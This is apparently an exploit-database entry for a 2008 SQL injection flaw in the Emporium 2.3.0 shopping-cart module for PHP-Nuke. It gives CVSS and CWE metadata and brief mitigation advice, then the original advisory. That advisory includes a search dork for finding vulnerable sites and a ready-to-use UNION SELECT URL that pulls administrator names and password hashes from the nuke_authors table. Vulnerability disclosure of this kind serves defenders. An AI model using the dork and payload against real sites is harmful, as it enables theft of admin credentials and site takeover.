header-logo
Suggest Exploit
vendor:
Emporium
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Emporium
Affected Version From: 2.3.2000
Affected Version To: 2.3.2000
Patch Exists: No
Related CWE: N/A
CPE: a:burnwave:emporium:2.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability

A SQL injection vulnerability exists in the Emporium 2.3.0 module for PHP-Nuke. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

||| PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability
||   Author: Hussin X
||   Home :  WwW.IQ-TY.CoM<http://WwW.IQ-TY.CoM>
||   email:  darkangel_g85[at]Yahoo[DoT]com
||| DorK   : inurl:modules.php?name=Shopping_Cart
||| more
 Module's Name: Emporium
 Module's Version: 2.3.0
 Module's Description: eCommerce for PHP-Nuke.
 License: Burnwave Emporium License
 Author's Name: Michael Squires
 Module's Download  http://www.burnwave.com/


 Exploit
________

http://server/modules.php?name=Shopping_Cart&file=category&category_id=4+uNioN+sElEcT+'IQ-SecuritY',aid,pwd+from+nuke_authors--




end.

IQ-SecuritY FoRuM